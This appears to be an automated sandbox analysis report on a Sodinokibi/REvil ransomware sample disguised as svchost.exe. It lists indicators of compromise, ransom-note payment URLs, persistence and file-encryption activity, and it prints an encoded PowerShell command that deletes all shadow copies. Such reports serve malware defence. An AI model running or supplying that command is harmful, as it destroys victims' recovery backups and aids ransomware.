Analysis
-
max time kernel
144s -
max time network
145s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
11-06-2020 16:15
Static task
static1
Behavioral task
behavioral1
Sample
svchost.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
svchost.exe
Resource
win10v200430
General
-
Target
svchost.exe
-
Size
166KB
-
MD5
cfd0e9822b75398979cf876a752ef248
-
SHA1
2ed7e7697375b73dd10a62934a3d29192a993f4e
-
SHA256
6361413fd0b01dd9bee8c2d942c78a0550eff7292c2ec5bd5bc840413fea1d7e
-
SHA512
f0d9a9b2dcbbfb832337672769d4ee1814f3034fab9775c02ad752e949c1ca8dddb45586ef635389328d8c9597b036948ff6b6b3c8a7886b4fb7058d0546762a
Malware Config
Extracted
C:\ynzi30-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A53D520FEDDA4258
http://decryptor.cc/A53D520FEDDA4258
Signatures
-
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\oXnEn2JlQT = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe" svchost.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
svchost.exedescription pid process target process PID 3748 wrote to memory of 428 3748 svchost.exe powershell.exe PID 3748 wrote to memory of 428 3748 svchost.exe powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 19 IoCs
Processes:
svchost.exedescription ioc process File opened for modification \??\c:\program files\LockRedo.kix svchost.exe File opened for modification \??\c:\program files\WaitExit.MTS svchost.exe File created \??\c:\program files\ynzi30-readme.txt svchost.exe File opened for modification \??\c:\program files\CompressGet.wps svchost.exe File opened for modification \??\c:\program files\SetPush.ex_ svchost.exe File opened for modification \??\c:\program files\SyncConvert.dotm svchost.exe File opened for modification \??\c:\program files\UnprotectDismount.crw svchost.exe File created \??\c:\program files (x86)\ynzi30-readme.txt svchost.exe File opened for modification \??\c:\program files\SearchReceive.tiff svchost.exe File opened for modification \??\c:\program files\SuspendRead.rtf svchost.exe File opened for modification \??\c:\program files\SwitchOptimize.wm svchost.exe File opened for modification \??\c:\program files\UnlockGet.mpe svchost.exe File opened for modification \??\c:\program files\MeasureSearch.pdf svchost.exe File opened for modification \??\c:\program files\RepairRead.nfo svchost.exe File opened for modification \??\c:\program files\SplitMerge.ini svchost.exe File opened for modification \??\c:\program files\SubmitResolve.dotx svchost.exe File opened for modification \??\c:\program files\UpdateConnect.odt svchost.exe File opened for modification \??\c:\program files\WaitJoin.xls svchost.exe File opened for modification \??\c:\program files\ConvertFromBackup.pps svchost.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\u42p2.bmp" svchost.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
svchost.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3748 svchost.exe Token: SeDebugPrivilege 428 powershell.exe Token: SeBackupPrivilege 1692 vssvc.exe Token: SeRestorePrivilege 1692 vssvc.exe Token: SeAuditPrivilege 1692 vssvc.exe Token: SeTakeOwnershipPrivilege 3748 svchost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
svchost.exepowershell.exepid process 3748 svchost.exe 3748 svchost.exe 428 powershell.exe 428 powershell.exe 428 powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Adds Run entry to start application
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:428
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:576
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1692